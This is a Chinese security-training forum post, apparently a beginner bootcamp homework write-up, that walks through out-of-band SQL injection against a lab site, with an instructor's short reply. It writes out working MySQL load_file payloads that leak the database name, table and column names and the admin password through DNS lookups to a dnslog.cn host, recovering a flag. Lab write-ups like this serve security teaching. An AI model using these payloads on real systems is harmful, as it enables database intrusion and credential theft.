训练营0基础day1作业

或许吧   ·   发表于 2020-09-09 22:29:56   ·   闲聊灌水区

先测试一下
(select load_file(‘//abdkj.jdtppz.dnslog.cn/1.txt’))

(select load_file(concat(‘//‘,(select database()),’.jdtppz.dnslog.cn/1.txt’)))
select database() 查到当前数据库名
查到数据库名 maoshe
(select load_file(concat(‘//‘,(select table_name from information_schema.tables where table_schema=database() limit 0,1),’.jdtppz.dnslog.cn/1.txt’)))
information_schema.tables 系统表,里面包含了所有的数据库表名
where 条件
table_schema = database() 查询当前数据库
查到表 admin news

(select load_file(concat(‘//‘,(select column_name from information_schema.columns where table_name=’admin’ limit 0,1),’.jdtppz.dnslog.cn/1.txt’)))
information_schema.columns 里面包含了所有的字段名
table_name = ‘admin’ 查询这个表的字段名
查 admin表
查到字段 id username password

(select load_file(concat(‘//‘,(select password from maoshe.admin limit 0,1),’.jdtppz.dnslog.cn/1.txt’)))
查password
查到 bucuoyou flag-biubiu
查到的都是小写,有问题,所以要先hex编码
(select load_file(concat(‘//‘,(select hex(password) from maoshe.admin limit 0,1),’.jdtppz.dnslog.cn/1.txt’)))
hex编码后查到
627563756f796f75 466c61472d626975626975
bucuoyou FlaG-biubiu

打赏我,让我更有动力~

1 Reply   |  Until 2020-9-10 | 2505 View

Track-聂风
发表于 2020-9-10

作业直接提交给微信群里面的辅导员就可以,不需要提交到社区

评论列表

  • 加载数据中...

编写评论内容
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2022 掌控者 All Rights Reserved.